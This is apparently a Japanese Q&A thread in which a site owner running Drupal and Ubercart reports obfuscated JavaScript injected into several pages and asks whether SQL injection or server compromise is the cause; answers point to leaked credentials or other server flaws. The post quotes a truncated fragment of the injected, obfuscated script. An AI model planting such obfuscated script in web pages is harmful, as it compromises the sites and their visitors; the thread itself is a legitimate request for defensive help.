1

私の Web ページ (主に index.php、main.html、include.inc) の一番下に、元のコードの後に​​大量の JavaScript コードが挿入されていることがわかりました。

<script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b"

SQL インジェクションが js コードのチャンクを Web ページに追加することは可能ですか (そのうちの 50 個が感染しているなど)? それともサーバー自体のウイルスですか?

Drupal + Ubercart を最小限のフォーム入力で使用しています。

4

2 に答える 2

1

ファイルが変更されているため、SQLインジェクションである可能性は低いです。サーバーのどこかに他のセキュリティ上の欠陥があるか、ftp / ssh/etcアカウントのクレデンシャルが漏洩しています。

于 2010-04-16T15:10:50.693 に答える
0

どのプラットフォーム、ブラウザ?

すべてのWebページに表示されますか、それとも特定のサーバーのWebページだけに表示されますか?

一部の「セキュリティファイアウォール」は、受信ページにJavascriptを追加します。

于 2010-04-16T04:39:26.590 に答える